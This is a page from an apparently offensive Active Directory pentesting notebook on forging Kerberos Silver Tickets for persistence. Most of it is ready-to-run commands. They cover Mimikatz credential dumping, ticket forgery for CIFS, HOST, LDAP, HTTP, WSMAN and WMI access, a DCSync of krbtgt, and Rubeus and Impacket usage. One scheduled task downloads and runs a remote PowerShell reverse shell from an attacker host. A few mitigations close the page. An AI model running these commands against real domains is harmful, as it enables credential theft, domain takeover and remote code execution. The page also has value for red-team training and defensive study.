Silver Tickets

While most of the attention goes towards Golden Tickets as a means of persistence, Silver Tickets are also an effective method, and arguably quieter as well.

The difference is that while the scope is much larger if you use Golden Tickets, Silver Tickets limit your access to the service you wish to target.

Silver Tickets can be forged to gain access to a service in an AD if you are able to obtain the password hash of the service account running that service. That is because Ticket Granting Service (TGS) tickets are signed and encrypted with the hash of the account running the service. Therefore, having the hash of this account enables you to forge TGS tickets.

It should be noted that not only can you forge Silver Tickets from the hashes of service accounts, but can be done computer account hashes as well since these accounts run many services on the machine (like CIFS) as the local system. The computer hash does not have to be a Domain Controller hash. A computer that has access to the Domain Controller via group membership works as well.

Just like Golden Tickets, the forged ticket can be created on behalf of any user, including fake accounts.

If the Privileged Attribute Certificate (PAC) is not validated inside the TGS, it can be manipulated to elevate the account's privileges to that of an Admin.

A common method to obtain a service account hash is through kerberoasting.

I have explained already the Kerberos Authentication mechanism here.

There are 3 reasons why this persistence technique is so effective:

  1. The hash of a service account is easier to obtain than that of the krbtgt.

  2. It bypasses steps 1-4 of the Kerberos Authentication process altogether, meaning that forging a ticket requires no communication whatsoever with the Domain Controller. Log events will only be seen from the machines running the services you want to gain access to.

  3. While computer account passwords are typically changed every 30 days, this can be disabled[1]. Regardless, 30 days to persist with this hash is still a reasonable amount of time.

With Rubeus.exe

# First request a TGT
.\Rubeus.exe asktgt /user:<user> /rc4:<hash>
# Then request a TGS
.\Rubeus.exe asktgs /ticket:<b64_ticket> /service:<service>/<domain>[,<service2>/<domain>] /ptt

With Mimikatz

Getting the Service Account or Computer Hashes

Invoke-Mimikatz -Command '“privilege::debug” “sekurlsa::logonpasswords”'

The General Command to Issue the Ticket

  • The '/ptt' command injects the ticket into memory

  • You can also use the '/ticket' command instead to save the ticket into a file

Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<target-domain> /service:<service> /rc4:<service-acct-or-computer-hash> /user:Administrator /ptt"'

Accessing Shares on the DC Using the DC Computer Hash

Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc.domain> /service:cifs /rc4:<DC$-hash> /user:Administrator /ptt"'

# Then check your access
ls \\dc.domain\C$

Creating a Silver Ticket That Allows You to Build and Run Scheduled Tasks as a Method of Persistence

Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc.domain> /service:HOST /rc4:<computer-hash> /user:Administrator /ptt"'

  • Then Build and Run a Scheduled Task

# setup the scheduled task
schtasks /create /S <dc_domain> /SC Weekly /RU "NT Authority\SYSTEM" /TN "<name>" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://<ip>/Invoke-PowerShellTcp.ps1''')'"

# then run it and wait for your reverse shell
schtasks /Run /S <dc_domain> /TN "<name>"

# if you want to end or delete the task:
schtasks /End /S <dc_domain> /TN "<name>"
schtasks /delete /S <dc_domain> /TN "<name>"

Using Silver Tickets to Create a New Powershell Remoting Session

  • This attack requires two tickets, one for the http and the other for the wsman SPN

# Create a ticket for the HTTP Service
Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc.domain> /service:HTTP /rc4:<computer-hash> /user:Administrator /ptt"'

# Now for the wsman SPN
Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc.domain> /service:WSMAN /rc4:<computer-hash> /user:Administrator /ptt"'

# check if the tickets are created
klist

# Then enter a new session
$sess = New-PSSession -ComputerName <computer>
Enter-PSSession -Session $sess

Using Silver Tickets to Gain Access to LDAP Services

Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc.domain> /service:LDAP /rc4:<computer-hash> /user:Administrator /ptt"'

  • Then you can run DCSync to get the krbtgt creds

Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt /dc:<dc.domain> /domain:<domain>"'

Using Silver Tickets to Gain Access to Services Running on HTTP

Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc.domain> /service:HTTP /rc4:<computer-hash> /user:Administrator /ptt"'

# then check your access
Invoke-WebRequest -UseBasicParsing -UseDefaultCredentials http://dc.domain

Using Silver Tickets to Access WMI

  • Requires tickets for both HOST and RPCSS

Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc.domain> /service:HOST /rc4:<computer-hash> /user:Administrator /ptt"'

Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc.domain> /service:RPCSS /rc4:<computer-hash> /user:Administrator /ptt"'

# check if the tickets are injected
klist

# then check your access -> if output -> success
Get-WmiObject Win32_Processor -ComputerName <dc.domain>

# then run commands
$command = "ping <ip>"
Invoke-WmiMethod win32_process -ComputerName <dc.domain> -Name create -ArgumentList "$command"

With Impacket

Ticketer.py

# Step 1
python3 ticketer.py -nthash <hash> -domain-sid <domain-SID> -domain <domain> -spn <SPN>/<dc_domain> -dc-ip <dc-ip> Administrator

# Step 2
export KRB5CCNAME=Administrator.ccache

# Step 3 (psexec.py also works if CIFS is the SPN)
python3 wmiexec.py Administrator@<dc_domain> -k -no-pass

GetST.py

# Step 1
python3 getST.py -spn <SPN>/<domain> -dc-ip <ip> -impersonate Administrator <user> [-hashes <lm:nt>]

# Step 2
export KRB5CCNAME=Administrator.ccache

# Step 3 -> access the service

Mitigations

  • Have good control over the service accounts. Limit their access as best as you can in order to minimize the chances of the accounts being compromised.

  • Monitor the logon events on the local machines and use ATA to try and correlate TGS requests with TGT requests to the DC.

  • Make sure no computer accounts are members of admin groups and check regularly whether there are any computer accounts in admin groups.

  • Make sure that computer account passwords are changed regularly.

References

[1] https://adsecurity.org/?p=2753

PreviousGolden TicketsNextSkeleton Keys

Last updated